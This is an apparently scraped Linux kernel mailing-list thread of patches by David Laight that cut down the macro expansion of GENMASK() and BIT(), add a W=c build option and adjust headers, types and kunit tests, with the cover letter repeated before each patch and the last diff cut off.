Some compile time checks significantly bloat the pre-processor output
(particularly when the get nested).
Since the checks aren't really needed on every compilation enable with
W=c (adds -DKBUILD_EXTRA_WARNc) so the checks can be enabled per-build.
Make W=1 imply W=c so the build-bot includes the checks.
As well as reducing the bloat from existing checks (like those in
GENMASK() and FIELD_PREP()) it lets additional checks be added
while there are still 'false positives' without breaking normal builds.
Signed-off-by: David Laight <david.laight.linux@gmail.com>
---
scripts/Makefile.warn | 12 ++++++++++--
1 file changed, 10 insertions(+), 2 deletions(-)
diff --git a/scripts/Makefile.warn b/scripts/Makefile.warn
index 68e6fafcb80c..e8a799850973 100644
--- a/scripts/Makefile.warn
+++ b/scripts/Makefile.warn
@@ -2,8 +2,9 @@
# ==========================================================================
# make W=... settings
#
-# There are four warning groups enabled by W=1, W=2, W=3, and W=e
-# They are independent, and can be combined like W=12 or W=123e.
+# There are five warning groups enabled by W=c, W=1, W=2, W=3, and W=e
+# They are independent, and can be combined like W=12 or W=123e,
+# except that W=1 implies W=c.
# ==========================================================================
# Default set of warnings, always enabled
@@ -109,6 +110,13 @@ KBUILD_CFLAGS += $(call cc-option,-Wenum-conversion)
KBUILD_CFLAGS += -Wunused
+#
+# W=c - Expensive compile-time checks, implied by W=1
+#
+ifneq ($(findstring c, $(KBUILD_EXTRA_WARN))$(findstring 1, $(KBUILD_EXTRA_WARN)),)
+KBUILD_CPPFLAGS += -DKBUILD_EXTRA_WARNc
+endif
+
#
# W=1 - warnings which may be relevant and do not occur too often
#
--
2.39.5
|
{
"author": "david.laight.linux@gmail.com",
"date": "Wed, 21 Jan 2026 14:57:19 +0000",
"thread_id": "20260121145731.3623-1-david.laight.linux@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH next 00/14] bits: De-bloat expansion of GENMASK()
|
From: David Laight <david.laight.linux@gmail.com>
The expansion of GENMASK() is a few hundred bytes, this is often multiplied
when the value is passed to other #defines (eg FIELD_PREP).
Part of the size is due to the compile-type check (for reversed arguments),
the rest from the way the value is defined.
Nothing in these patches changes the code the compiler sees - just the
way the constants get defined.
Changing GENMASK(hi, lo) to (2 << hi) - (1 << lo) is left for further study.
I looked at getting the compiler to check for reversed arguments using
(0 >> (hi - lo)) instead of const_true(lo > hi). While checking that it
was always optimised away I discovered that you don't get an error message
if the values are only 'compile time constants', worse clang starts
throwing code away, generation an empty function for:
int f(u32 x) {int n = 32; return x >> n; }
(Shifts by more than width are 'undefined behaviour', so what clang
does is technically valid - but not friendly or expected.)
So I added extra checks to both GENMASK() and BITxxx() to detect this
at compile time. But this bloats the output - the opposite of what I
was trying to achieve.
However these are all compile-time checks that are actually unlikely
to detect anything, they don't need to be done on every build.
I've mitigated this by adding W=c (cf W=[123e]) to the main Makefile
(adding -DKBUILD_EXTRA_WARNc) and defaulting to W=c for W=1 builds.
Adding checks to BIT() makes it no longer a pre-processor constant
so can no longer be used in #if statements (when W=c) is set.
This required minor changes to 3 files.
At some point the definition of BIT() was moved to vdso/bits.h
(followed by that for BIT_ULL()), but then the fixed size BIT_Unn()
were added to bits.h.
I've moved BIT_ULL() back to linux/bits.h and made the version of
BIT() in linux/bits.h be preferred if both files get included.
Note that the x86-64 allmodconfig build suceeds if vdso/bits.h
is empty - everything includes linux/bits.h first.
I found two non-vdso files that included vdso/bits.h and changed
them to use linux/bits.h.
GENMASK_U8() and BIT_U8() cast their result to (u8), this isn't
a good idea. While the 'type of the expression' is 'u8', integer
promotion makes the 'type of the value' 'signed int'.
This means that in code like:
u64 v = BIT_U8(7) << 24;
the value is sign extended and all the high bits are set.
Instead change the type of the xxx_U8/U16 macros to 'unsigned int'
so that the sign extension cannot happen.
The compile-time check on the bit number is still present.
For assembler files where GENMASK() can be used for constants
the expansions from uapi/linux/bits.h were used.
However these contain BITS_PER_LONG and BITS_PER_LONG_LONG which
make no sense since the assembler doesn't have sized arithmetic.
Replace with GENMASK(hi, lo) (2 << (hi)) - (1 << (lo)) which has
the correct value without knowing the size of the integers.
The kunit tests all check compile-time values.
I've changed them to use BUILD_BUG_ON().
David Laight (14):
overflow: Reduce expansion of __type_max()
kbuild: Add W=c for additional compile time checks
media: videobuf2-core: Use static_assert() for sanity check
media: atomisp: Use static_assert() for sanity check
ixgbevf: Use C test for PAGE_SIZE > IXGBE_MAX_DATA_PER_TXD
asm-generic: include linux/bits.h not vdso/bits.h
x86/tlb: include linux/bits.h not vdso/bits.h
bits: simplify GENMASK_TYPE()
bits: Change BIT_U8/16() and GENMASK_U8/16() to have unsigned values
bits: Fix assmebler expansions of GENMASK_Uxx() and BIT_Uxx()
bit: Strengthen compile-time tests in GENMASK() and BIT()
bits: move the defitions of BIT() and BIT_ULL() back to linux/bits.h
test_bits: Change all the tests to be compile-time tests
test_bits: include some invalid input tests for GENMASK_INPUT_CHECK()
arch/x86/include/asm/tlb.h | 2 +-
.../media/common/videobuf2/videobuf2-core.c | 6 +-
.../net/ethernet/intel/ixgbevf/ixgbevf_main.c | 17 +--
.../fixedbds_1.0/ia_css_fixedbds_param.h | 5 +-
include/asm-generic/thread_info_tif.h | 2 +-
include/linux/bits.h | 88 ++++++++----
include/linux/overflow.h | 2 +-
include/vdso/bits.h | 2 +-
lib/tests/test_bits.c | 130 +++++++++++-------
scripts/Makefile.warn | 12 +-
10 files changed, 162 insertions(+), 104 deletions(-)
--
2.39.5
|
From: David Laight <david.laight.linux@gmail.com>
Compile-time tests being added to BIT() make it an 'integer constant
expression' rather than a pre-processor expression for W=1 builds.
Change the FRAC_ACC != BDS_UNIT test to use static_assert() so the code
compiles.
Signed-off-by: David Laight <david.laight.linux@gmail.com>
---
.../kernels/fixedbds/fixedbds_1.0/ia_css_fixedbds_param.h | 5 ++---
1 file changed, 2 insertions(+), 3 deletions(-)
diff --git a/drivers/staging/media/atomisp/pci/isp/kernels/fixedbds/fixedbds_1.0/ia_css_fixedbds_param.h b/drivers/staging/media/atomisp/pci/isp/kernels/fixedbds/fixedbds_1.0/ia_css_fixedbds_param.h
index f7e5669d5125..31bce7b2650e 100644
--- a/drivers/staging/media/atomisp/pci/isp/kernels/fixedbds/fixedbds_1.0/ia_css_fixedbds_param.h
+++ b/drivers/staging/media/atomisp/pci/isp/kernels/fixedbds/fixedbds_1.0/ia_css_fixedbds_param.h
@@ -13,9 +13,8 @@
#define BDS_UNIT 8
#define FRAC_LOG 3
#define FRAC_ACC BIT(FRAC_LOG)
-#if FRAC_ACC != BDS_UNIT
-#error "FRAC_ACC and BDS_UNIT need to be merged into one define"
-#endif
+static_assert(FRAC_ACC == BDS_UNIT,
+ "FRAC_ACC and BDS_UNIT need to be merged into one define");
struct sh_css_isp_bds_params {
int baf_strength;
--
2.39.5
|
{
"author": "david.laight.linux@gmail.com",
"date": "Wed, 21 Jan 2026 14:57:21 +0000",
"thread_id": "20260121145731.3623-1-david.laight.linux@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH next 00/14] bits: De-bloat expansion of GENMASK()
|
From: David Laight <david.laight.linux@gmail.com>
The expansion of GENMASK() is a few hundred bytes, this is often multiplied
when the value is passed to other #defines (eg FIELD_PREP).
Part of the size is due to the compile-type check (for reversed arguments),
the rest from the way the value is defined.
Nothing in these patches changes the code the compiler sees - just the
way the constants get defined.
Changing GENMASK(hi, lo) to (2 << hi) - (1 << lo) is left for further study.
I looked at getting the compiler to check for reversed arguments using
(0 >> (hi - lo)) instead of const_true(lo > hi). While checking that it
was always optimised away I discovered that you don't get an error message
if the values are only 'compile time constants', worse clang starts
throwing code away, generation an empty function for:
int f(u32 x) {int n = 32; return x >> n; }
(Shifts by more than width are 'undefined behaviour', so what clang
does is technically valid - but not friendly or expected.)
So I added extra checks to both GENMASK() and BITxxx() to detect this
at compile time. But this bloats the output - the opposite of what I
was trying to achieve.
However these are all compile-time checks that are actually unlikely
to detect anything, they don't need to be done on every build.
I've mitigated this by adding W=c (cf W=[123e]) to the main Makefile
(adding -DKBUILD_EXTRA_WARNc) and defaulting to W=c for W=1 builds.
Adding checks to BIT() makes it no longer a pre-processor constant
so can no longer be used in #if statements (when W=c) is set.
This required minor changes to 3 files.
At some point the definition of BIT() was moved to vdso/bits.h
(followed by that for BIT_ULL()), but then the fixed size BIT_Unn()
were added to bits.h.
I've moved BIT_ULL() back to linux/bits.h and made the version of
BIT() in linux/bits.h be preferred if both files get included.
Note that the x86-64 allmodconfig build suceeds if vdso/bits.h
is empty - everything includes linux/bits.h first.
I found two non-vdso files that included vdso/bits.h and changed
them to use linux/bits.h.
GENMASK_U8() and BIT_U8() cast their result to (u8), this isn't
a good idea. While the 'type of the expression' is 'u8', integer
promotion makes the 'type of the value' 'signed int'.
This means that in code like:
u64 v = BIT_U8(7) << 24;
the value is sign extended and all the high bits are set.
Instead change the type of the xxx_U8/U16 macros to 'unsigned int'
so that the sign extension cannot happen.
The compile-time check on the bit number is still present.
For assembler files where GENMASK() can be used for constants
the expansions from uapi/linux/bits.h were used.
However these contain BITS_PER_LONG and BITS_PER_LONG_LONG which
make no sense since the assembler doesn't have sized arithmetic.
Replace with GENMASK(hi, lo) (2 << (hi)) - (1 << (lo)) which has
the correct value without knowing the size of the integers.
The kunit tests all check compile-time values.
I've changed them to use BUILD_BUG_ON().
David Laight (14):
overflow: Reduce expansion of __type_max()
kbuild: Add W=c for additional compile time checks
media: videobuf2-core: Use static_assert() for sanity check
media: atomisp: Use static_assert() for sanity check
ixgbevf: Use C test for PAGE_SIZE > IXGBE_MAX_DATA_PER_TXD
asm-generic: include linux/bits.h not vdso/bits.h
x86/tlb: include linux/bits.h not vdso/bits.h
bits: simplify GENMASK_TYPE()
bits: Change BIT_U8/16() and GENMASK_U8/16() to have unsigned values
bits: Fix assmebler expansions of GENMASK_Uxx() and BIT_Uxx()
bit: Strengthen compile-time tests in GENMASK() and BIT()
bits: move the defitions of BIT() and BIT_ULL() back to linux/bits.h
test_bits: Change all the tests to be compile-time tests
test_bits: include some invalid input tests for GENMASK_INPUT_CHECK()
arch/x86/include/asm/tlb.h | 2 +-
.../media/common/videobuf2/videobuf2-core.c | 6 +-
.../net/ethernet/intel/ixgbevf/ixgbevf_main.c | 17 +--
.../fixedbds_1.0/ia_css_fixedbds_param.h | 5 +-
include/asm-generic/thread_info_tif.h | 2 +-
include/linux/bits.h | 88 ++++++++----
include/linux/overflow.h | 2 +-
include/vdso/bits.h | 2 +-
lib/tests/test_bits.c | 130 +++++++++++-------
scripts/Makefile.warn | 12 +-
10 files changed, 162 insertions(+), 104 deletions(-)
--
2.39.5
|
From: David Laight <david.laight.linux@gmail.com>
asm/tlb.h isn't part of the vdso, use the linux/bits.h header.
Signed-off-by: David Laight <david.laight.linux@gmail.com>
---
arch/x86/include/asm/tlb.h | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/arch/x86/include/asm/tlb.h b/arch/x86/include/asm/tlb.h
index 866ea78ba156..e61c6de73e70 100644
--- a/arch/x86/include/asm/tlb.h
+++ b/arch/x86/include/asm/tlb.h
@@ -7,7 +7,7 @@ static inline void tlb_flush(struct mmu_gather *tlb);
#include <asm-generic/tlb.h>
#include <linux/kernel.h>
-#include <vdso/bits.h>
+#include <linux/bits.h>
#include <vdso/page.h>
static inline void tlb_flush(struct mmu_gather *tlb)
--
2.39.5
|
{
"author": "david.laight.linux@gmail.com",
"date": "Wed, 21 Jan 2026 14:57:24 +0000",
"thread_id": "20260121145731.3623-1-david.laight.linux@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH next 00/14] bits: De-bloat expansion of GENMASK()
|
From: David Laight <david.laight.linux@gmail.com>
The expansion of GENMASK() is a few hundred bytes, this is often multiplied
when the value is passed to other #defines (eg FIELD_PREP).
Part of the size is due to the compile-type check (for reversed arguments),
the rest from the way the value is defined.
Nothing in these patches changes the code the compiler sees - just the
way the constants get defined.
Changing GENMASK(hi, lo) to (2 << hi) - (1 << lo) is left for further study.
I looked at getting the compiler to check for reversed arguments using
(0 >> (hi - lo)) instead of const_true(lo > hi). While checking that it
was always optimised away I discovered that you don't get an error message
if the values are only 'compile time constants', worse clang starts
throwing code away, generation an empty function for:
int f(u32 x) {int n = 32; return x >> n; }
(Shifts by more than width are 'undefined behaviour', so what clang
does is technically valid - but not friendly or expected.)
So I added extra checks to both GENMASK() and BITxxx() to detect this
at compile time. But this bloats the output - the opposite of what I
was trying to achieve.
However these are all compile-time checks that are actually unlikely
to detect anything, they don't need to be done on every build.
I've mitigated this by adding W=c (cf W=[123e]) to the main Makefile
(adding -DKBUILD_EXTRA_WARNc) and defaulting to W=c for W=1 builds.
Adding checks to BIT() makes it no longer a pre-processor constant
so can no longer be used in #if statements (when W=c) is set.
This required minor changes to 3 files.
At some point the definition of BIT() was moved to vdso/bits.h
(followed by that for BIT_ULL()), but then the fixed size BIT_Unn()
were added to bits.h.
I've moved BIT_ULL() back to linux/bits.h and made the version of
BIT() in linux/bits.h be preferred if both files get included.
Note that the x86-64 allmodconfig build suceeds if vdso/bits.h
is empty - everything includes linux/bits.h first.
I found two non-vdso files that included vdso/bits.h and changed
them to use linux/bits.h.
GENMASK_U8() and BIT_U8() cast their result to (u8), this isn't
a good idea. While the 'type of the expression' is 'u8', integer
promotion makes the 'type of the value' 'signed int'.
This means that in code like:
u64 v = BIT_U8(7) << 24;
the value is sign extended and all the high bits are set.
Instead change the type of the xxx_U8/U16 macros to 'unsigned int'
so that the sign extension cannot happen.
The compile-time check on the bit number is still present.
For assembler files where GENMASK() can be used for constants
the expansions from uapi/linux/bits.h were used.
However these contain BITS_PER_LONG and BITS_PER_LONG_LONG which
make no sense since the assembler doesn't have sized arithmetic.
Replace with GENMASK(hi, lo) (2 << (hi)) - (1 << (lo)) which has
the correct value without knowing the size of the integers.
The kunit tests all check compile-time values.
I've changed them to use BUILD_BUG_ON().
David Laight (14):
overflow: Reduce expansion of __type_max()
kbuild: Add W=c for additional compile time checks
media: videobuf2-core: Use static_assert() for sanity check
media: atomisp: Use static_assert() for sanity check
ixgbevf: Use C test for PAGE_SIZE > IXGBE_MAX_DATA_PER_TXD
asm-generic: include linux/bits.h not vdso/bits.h
x86/tlb: include linux/bits.h not vdso/bits.h
bits: simplify GENMASK_TYPE()
bits: Change BIT_U8/16() and GENMASK_U8/16() to have unsigned values
bits: Fix assmebler expansions of GENMASK_Uxx() and BIT_Uxx()
bit: Strengthen compile-time tests in GENMASK() and BIT()
bits: move the defitions of BIT() and BIT_ULL() back to linux/bits.h
test_bits: Change all the tests to be compile-time tests
test_bits: include some invalid input tests for GENMASK_INPUT_CHECK()
arch/x86/include/asm/tlb.h | 2 +-
.../media/common/videobuf2/videobuf2-core.c | 6 +-
.../net/ethernet/intel/ixgbevf/ixgbevf_main.c | 17 +--
.../fixedbds_1.0/ia_css_fixedbds_param.h | 5 +-
include/asm-generic/thread_info_tif.h | 2 +-
include/linux/bits.h | 88 ++++++++----
include/linux/overflow.h | 2 +-
include/vdso/bits.h | 2 +-
lib/tests/test_bits.c | 130 +++++++++++-------
scripts/Makefile.warn | 12 +-
10 files changed, 162 insertions(+), 104 deletions(-)
--
2.39.5
|
From: David Laight <david.laight.linux@gmail.com>
Casting the value of BIT_U*() and GENMASK_U8() to (u8) is pointless.
Although it changes what typeof(BIT_U8()) returns the value will
always be promoted to 'signed int' before it is used.
Instead force the expression to be an unsigned type.
Avoids unexpected sign extension from, for example:
u64 v = BIT_U8(7) << 24;
Fix the KUNIT tests to match.
Signed-off-by: David Laight <david.laight.linux@gmail.com>
---
include/linux/bits.h | 6 +++---
lib/tests/test_bits.c | 12 ++++++------
2 files changed, 9 insertions(+), 9 deletions(-)
diff --git a/include/linux/bits.h b/include/linux/bits.h
index 697318f2a47d..23bc94815569 100644
--- a/include/linux/bits.h
+++ b/include/linux/bits.h
@@ -44,8 +44,8 @@
* - GENMASK_U32(33, 15): doesn't fit in a u32
*/
#define GENMASK_TYPE(t, h, l) \
- ((t)(GENMASK_INPUT_CHECK(h, l) + \
- ((t)-1 << (l) & (t)-1 >> (BITS_PER_TYPE(t) - 1 - (h)))))
+ ((unsigned int)GENMASK_INPUT_CHECK(h, l) + \
+ ((t)-1 << (l) & (t)-1 >> (BITS_PER_TYPE(t) - 1 - (h))))
#define GENMASK(h, l) GENMASK_TYPE(unsigned long, h, l)
#define GENMASK_ULL(h, l) GENMASK_TYPE(unsigned long long, h, l)
@@ -67,7 +67,7 @@
#define BIT_INPUT_CHECK(type, nr) \
BUILD_BUG_ON_ZERO(const_true((nr) >= BITS_PER_TYPE(type)))
-#define BIT_TYPE(type, nr) ((type)(BIT_INPUT_CHECK(type, nr) + BIT_ULL(nr)))
+#define BIT_TYPE(type, nr) ((unsigned int)BIT_INPUT_CHECK(type, nr) + ((type)1 << (nr)))
#define BIT_U8(nr) BIT_TYPE(u8, nr)
#define BIT_U16(nr) BIT_TYPE(u16, nr)
diff --git a/lib/tests/test_bits.c b/lib/tests/test_bits.c
index ab88e50d2edf..55be8230f9e7 100644
--- a/lib/tests/test_bits.c
+++ b/lib/tests/test_bits.c
@@ -9,20 +9,20 @@
#define assert_type(t, x) _Generic(x, t: x, default: 0)
-static_assert(assert_type(u8, BIT_U8(0)) == 1u);
-static_assert(assert_type(u16, BIT_U16(0)) == 1u);
+static_assert(assert_type(unsigned int, BIT_U8(0)) == 1u);
+static_assert(assert_type(unsigned int, BIT_U16(0)) == 1u);
static_assert(assert_type(u32, BIT_U32(0)) == 1u);
static_assert(assert_type(u64, BIT_U64(0)) == 1ull);
-static_assert(assert_type(u8, BIT_U8(7)) == 0x80u);
-static_assert(assert_type(u16, BIT_U16(15)) == 0x8000u);
+static_assert(assert_type(unsigned int, BIT_U8(7)) == 0x80u);
+static_assert(assert_type(unsigned int, BIT_U16(15)) == 0x8000u);
static_assert(assert_type(u32, BIT_U32(31)) == 0x80000000u);
static_assert(assert_type(u64, BIT_U64(63)) == 0x8000000000000000ull);
static_assert(assert_type(unsigned long, GENMASK(31, 0)) == U32_MAX);
static_assert(assert_type(unsigned long long, GENMASK_ULL(63, 0)) == U64_MAX);
-static_assert(assert_type(u8, GENMASK_U8(7, 0)) == U8_MAX);
-static_assert(assert_type(u16, GENMASK_U16(15, 0)) == U16_MAX);
+static_assert(assert_type(unsigned int, GENMASK_U8(7, 0)) == U8_MAX);
+static_assert(assert_type(unsigned int, GENMASK_U16(15, 0)) == U16_MAX);
static_assert(assert_type(u32, GENMASK_U32(31, 0)) == U32_MAX);
static_assert(assert_type(u64, GENMASK_U64(63, 0)) == U64_MAX);
--
2.39.5
|
{
"author": "david.laight.linux@gmail.com",
"date": "Wed, 21 Jan 2026 14:57:26 +0000",
"thread_id": "20260121145731.3623-1-david.laight.linux@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH next 00/14] bits: De-bloat expansion of GENMASK()
|
From: David Laight <david.laight.linux@gmail.com>
The expansion of GENMASK() is a few hundred bytes, this is often multiplied
when the value is passed to other #defines (eg FIELD_PREP).
Part of the size is due to the compile-type check (for reversed arguments),
the rest from the way the value is defined.
Nothing in these patches changes the code the compiler sees - just the
way the constants get defined.
Changing GENMASK(hi, lo) to (2 << hi) - (1 << lo) is left for further study.
I looked at getting the compiler to check for reversed arguments using
(0 >> (hi - lo)) instead of const_true(lo > hi). While checking that it
was always optimised away I discovered that you don't get an error message
if the values are only 'compile time constants', worse clang starts
throwing code away, generation an empty function for:
int f(u32 x) {int n = 32; return x >> n; }
(Shifts by more than width are 'undefined behaviour', so what clang
does is technically valid - but not friendly or expected.)
So I added extra checks to both GENMASK() and BITxxx() to detect this
at compile time. But this bloats the output - the opposite of what I
was trying to achieve.
However these are all compile-time checks that are actually unlikely
to detect anything, they don't need to be done on every build.
I've mitigated this by adding W=c (cf W=[123e]) to the main Makefile
(adding -DKBUILD_EXTRA_WARNc) and defaulting to W=c for W=1 builds.
Adding checks to BIT() makes it no longer a pre-processor constant
so can no longer be used in #if statements (when W=c) is set.
This required minor changes to 3 files.
At some point the definition of BIT() was moved to vdso/bits.h
(followed by that for BIT_ULL()), but then the fixed size BIT_Unn()
were added to bits.h.
I've moved BIT_ULL() back to linux/bits.h and made the version of
BIT() in linux/bits.h be preferred if both files get included.
Note that the x86-64 allmodconfig build suceeds if vdso/bits.h
is empty - everything includes linux/bits.h first.
I found two non-vdso files that included vdso/bits.h and changed
them to use linux/bits.h.
GENMASK_U8() and BIT_U8() cast their result to (u8), this isn't
a good idea. While the 'type of the expression' is 'u8', integer
promotion makes the 'type of the value' 'signed int'.
This means that in code like:
u64 v = BIT_U8(7) << 24;
the value is sign extended and all the high bits are set.
Instead change the type of the xxx_U8/U16 macros to 'unsigned int'
so that the sign extension cannot happen.
The compile-time check on the bit number is still present.
For assembler files where GENMASK() can be used for constants
the expansions from uapi/linux/bits.h were used.
However these contain BITS_PER_LONG and BITS_PER_LONG_LONG which
make no sense since the assembler doesn't have sized arithmetic.
Replace with GENMASK(hi, lo) (2 << (hi)) - (1 << (lo)) which has
the correct value without knowing the size of the integers.
The kunit tests all check compile-time values.
I've changed them to use BUILD_BUG_ON().
David Laight (14):
overflow: Reduce expansion of __type_max()
kbuild: Add W=c for additional compile time checks
media: videobuf2-core: Use static_assert() for sanity check
media: atomisp: Use static_assert() for sanity check
ixgbevf: Use C test for PAGE_SIZE > IXGBE_MAX_DATA_PER_TXD
asm-generic: include linux/bits.h not vdso/bits.h
x86/tlb: include linux/bits.h not vdso/bits.h
bits: simplify GENMASK_TYPE()
bits: Change BIT_U8/16() and GENMASK_U8/16() to have unsigned values
bits: Fix assmebler expansions of GENMASK_Uxx() and BIT_Uxx()
bit: Strengthen compile-time tests in GENMASK() and BIT()
bits: move the defitions of BIT() and BIT_ULL() back to linux/bits.h
test_bits: Change all the tests to be compile-time tests
test_bits: include some invalid input tests for GENMASK_INPUT_CHECK()
arch/x86/include/asm/tlb.h | 2 +-
.../media/common/videobuf2/videobuf2-core.c | 6 +-
.../net/ethernet/intel/ixgbevf/ixgbevf_main.c | 17 +--
.../fixedbds_1.0/ia_css_fixedbds_param.h | 5 +-
include/asm-generic/thread_info_tif.h | 2 +-
include/linux/bits.h | 88 ++++++++----
include/linux/overflow.h | 2 +-
include/vdso/bits.h | 2 +-
lib/tests/test_bits.c | 130 +++++++++++-------
scripts/Makefile.warn | 12 +-
10 files changed, 162 insertions(+), 104 deletions(-)
--
2.39.5
|
From: David Laight <david.laight.linux@gmail.com>
thread_info_tif.h isn't part of the vdso, use the linux/bits.h header.
Signed-off-by: David Laight <david.laight.linux@gmail.com>
---
include/asm-generic/thread_info_tif.h | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/include/asm-generic/thread_info_tif.h b/include/asm-generic/thread_info_tif.h
index da1610a78f92..afdc23204674 100644
--- a/include/asm-generic/thread_info_tif.h
+++ b/include/asm-generic/thread_info_tif.h
@@ -2,7 +2,7 @@
#ifndef _ASM_GENERIC_THREAD_INFO_TIF_H_
#define _ASM_GENERIC_THREAD_INFO_TIF_H_
-#include <vdso/bits.h>
+#include <linux/bits.h>
/* Bits 16-31 are reserved for architecture specific purposes */
--
2.39.5
|
{
"author": "david.laight.linux@gmail.com",
"date": "Wed, 21 Jan 2026 14:57:23 +0000",
"thread_id": "20260121145731.3623-1-david.laight.linux@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH next 00/14] bits: De-bloat expansion of GENMASK()
|
From: David Laight <david.laight.linux@gmail.com>
The expansion of GENMASK() is a few hundred bytes, this is often multiplied
when the value is passed to other #defines (eg FIELD_PREP).
Part of the size is due to the compile-type check (for reversed arguments),
the rest from the way the value is defined.
Nothing in these patches changes the code the compiler sees - just the
way the constants get defined.
Changing GENMASK(hi, lo) to (2 << hi) - (1 << lo) is left for further study.
I looked at getting the compiler to check for reversed arguments using
(0 >> (hi - lo)) instead of const_true(lo > hi). While checking that it
was always optimised away I discovered that you don't get an error message
if the values are only 'compile time constants', worse clang starts
throwing code away, generation an empty function for:
int f(u32 x) {int n = 32; return x >> n; }
(Shifts by more than width are 'undefined behaviour', so what clang
does is technically valid - but not friendly or expected.)
So I added extra checks to both GENMASK() and BITxxx() to detect this
at compile time. But this bloats the output - the opposite of what I
was trying to achieve.
However these are all compile-time checks that are actually unlikely
to detect anything, they don't need to be done on every build.
I've mitigated this by adding W=c (cf W=[123e]) to the main Makefile
(adding -DKBUILD_EXTRA_WARNc) and defaulting to W=c for W=1 builds.
Adding checks to BIT() makes it no longer a pre-processor constant
so can no longer be used in #if statements (when W=c) is set.
This required minor changes to 3 files.
At some point the definition of BIT() was moved to vdso/bits.h
(followed by that for BIT_ULL()), but then the fixed size BIT_Unn()
were added to bits.h.
I've moved BIT_ULL() back to linux/bits.h and made the version of
BIT() in linux/bits.h be preferred if both files get included.
Note that the x86-64 allmodconfig build suceeds if vdso/bits.h
is empty - everything includes linux/bits.h first.
I found two non-vdso files that included vdso/bits.h and changed
them to use linux/bits.h.
GENMASK_U8() and BIT_U8() cast their result to (u8), this isn't
a good idea. While the 'type of the expression' is 'u8', integer
promotion makes the 'type of the value' 'signed int'.
This means that in code like:
u64 v = BIT_U8(7) << 24;
the value is sign extended and all the high bits are set.
Instead change the type of the xxx_U8/U16 macros to 'unsigned int'
so that the sign extension cannot happen.
The compile-time check on the bit number is still present.
For assembler files where GENMASK() can be used for constants
the expansions from uapi/linux/bits.h were used.
However these contain BITS_PER_LONG and BITS_PER_LONG_LONG which
make no sense since the assembler doesn't have sized arithmetic.
Replace with GENMASK(hi, lo) (2 << (hi)) - (1 << (lo)) which has
the correct value without knowing the size of the integers.
The kunit tests all check compile-time values.
I've changed them to use BUILD_BUG_ON().
David Laight (14):
overflow: Reduce expansion of __type_max()
kbuild: Add W=c for additional compile time checks
media: videobuf2-core: Use static_assert() for sanity check
media: atomisp: Use static_assert() for sanity check
ixgbevf: Use C test for PAGE_SIZE > IXGBE_MAX_DATA_PER_TXD
asm-generic: include linux/bits.h not vdso/bits.h
x86/tlb: include linux/bits.h not vdso/bits.h
bits: simplify GENMASK_TYPE()
bits: Change BIT_U8/16() and GENMASK_U8/16() to have unsigned values
bits: Fix assmebler expansions of GENMASK_Uxx() and BIT_Uxx()
bit: Strengthen compile-time tests in GENMASK() and BIT()
bits: move the defitions of BIT() and BIT_ULL() back to linux/bits.h
test_bits: Change all the tests to be compile-time tests
test_bits: include some invalid input tests for GENMASK_INPUT_CHECK()
arch/x86/include/asm/tlb.h | 2 +-
.../media/common/videobuf2/videobuf2-core.c | 6 +-
.../net/ethernet/intel/ixgbevf/ixgbevf_main.c | 17 +--
.../fixedbds_1.0/ia_css_fixedbds_param.h | 5 +-
include/asm-generic/thread_info_tif.h | 2 +-
include/linux/bits.h | 88 ++++++++----
include/linux/overflow.h | 2 +-
include/vdso/bits.h | 2 +-
lib/tests/test_bits.c | 130 +++++++++++-------
scripts/Makefile.warn | 12 +-
10 files changed, 162 insertions(+), 104 deletions(-)
--
2.39.5
|
From: David Laight <david.laight.linux@gmail.com>
The assembler only supports one type of signed integers, so expressions
using BITS_PER_LONG (etc) cannot be guaranteed to be correct.
Use ((2 << (h)) - (1 << (l))) for all assembler GENMASK() expansions and
add definitions of BIT_Uxx() as (1 << (nr)).
Note that 64bit results are (probably) only correct for 64bit builds
and 128bits results will never be valid.
Signed-off-by: David Laight <david.laight.linux@gmail.com>
---
include/linux/bits.h | 33 +++++++++++++++++----------------
1 file changed, 17 insertions(+), 16 deletions(-)
diff --git a/include/linux/bits.h b/include/linux/bits.h
index 23bc94815569..43631a334314 100644
--- a/include/linux/bits.h
+++ b/include/linux/bits.h
@@ -19,14 +19,6 @@
*/
#if !defined(__ASSEMBLY__)
-/*
- * Missing asm support
- *
- * GENMASK_U*() and BIT_U*() depend on BITS_PER_TYPE() which relies on sizeof(),
- * something not available in asm. Nevertheless, fixed width integers is a C
- * concept. Assembly code can rely on the long and long long versions instead.
- */
-
#include <linux/build_bug.h>
#include <linux/compiler.h>
#include <linux/overflow.h>
@@ -46,6 +38,7 @@
#define GENMASK_TYPE(t, h, l) \
((unsigned int)GENMASK_INPUT_CHECK(h, l) + \
((t)-1 << (l) & (t)-1 >> (BITS_PER_TYPE(t) - 1 - (h))))
+#endif
#define GENMASK(h, l) GENMASK_TYPE(unsigned long, h, l)
#define GENMASK_ULL(h, l) GENMASK_TYPE(unsigned long long, h, l)
@@ -56,9 +49,10 @@
#define GENMASK_U64(h, l) GENMASK_TYPE(u64, h, l)
#define GENMASK_U128(h, l) GENMASK_TYPE(u128, h, l)
+#if !defined(__ASSEMBLY__)
/*
- * Fixed-type variants of BIT(), with additional checks like GENMASK_TYPE(). The
- * following examples generate compiler warnings due to -Wshift-count-overflow:
+ * Fixed-type variants of BIT(), with additional checks like GENMASK_TYPE().
+ * The following examples generate compiler warnings from BIT_INPUT_CHECK().
*
* - BIT_U8(8)
* - BIT_U32(-1)
@@ -68,21 +62,28 @@
BUILD_BUG_ON_ZERO(const_true((nr) >= BITS_PER_TYPE(type)))
#define BIT_TYPE(type, nr) ((unsigned int)BIT_INPUT_CHECK(type, nr) + ((type)1 << (nr)))
+#endif /* defined(__ASSEMBLY__) */
#define BIT_U8(nr) BIT_TYPE(u8, nr)
#define BIT_U16(nr) BIT_TYPE(u16, nr)
#define BIT_U32(nr) BIT_TYPE(u32, nr)
#define BIT_U64(nr) BIT_TYPE(u64, nr)
-#else /* defined(__ASSEMBLY__) */
+#if defined(__ASSEMBLY__)
/*
- * BUILD_BUG_ON_ZERO is not available in h files included from asm files,
- * disable the input check if that is the case.
+ * The assmebler only supports one size of signed integer rather than
+ * the fixed width integer types of C.
+ * There is also no method for reported invalid input.
+ * Error in .h files will usually be picked up when compiled into C files.
+ *
+ * Define type-size agnostic definitions that generate the correct value
+ * provided it can be represented by the assembler.
*/
